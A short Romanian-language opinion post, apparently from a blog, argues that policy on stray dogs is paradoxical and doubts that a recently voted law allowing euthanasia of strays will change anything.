E paradoxal că este considerată contravenție „lăsarea în libertate ori fără supraveghere a animalelor care pot prezenta pericol pentru persoane sau bunuri” (Legea 61/1991, articolul 3:17; v. și feluritele acte ale administrației publice locale), dar față de animalele fără stăpân care sălășluiesc în oraș și care pot prezenta pericol pentru persoane autoritățile nu au nicio responsabilitate. Chiar și C.E.D.O. a condamnat recent statul român într-o speță care a pornit de la un incident cu câini vagabonzi.

E paradoxal și că, în vreme ce alte animale (ex. miei, porci, găini) sunt ucise pentru hrană (de multe ori, după ce au fost crescute în ferme în condiții revoltătoare), fără campanii de protest, în cazul uciderii câinilor fără stăpân există o opoziție însuflețită de atât „umanism”.

Nu-mi fac iluzii că legea votată recent, care a provocat atâtea istericale pe holurile parlamentului și pe la posturile TV, va schimba ceva. Consiliile locale vor dovedi umanism electoral, „cetățenii” se vor milostivi de bietele necuvântătoare, victimele vor continua să fie vinovate, iar cei care susțin eutanasia vor fi în continuare „criminali”, comparabili cu naziștii. S-a întâmplat vreodată ca literele unui text de lege să schimbe ceva în această țară?

@trolling off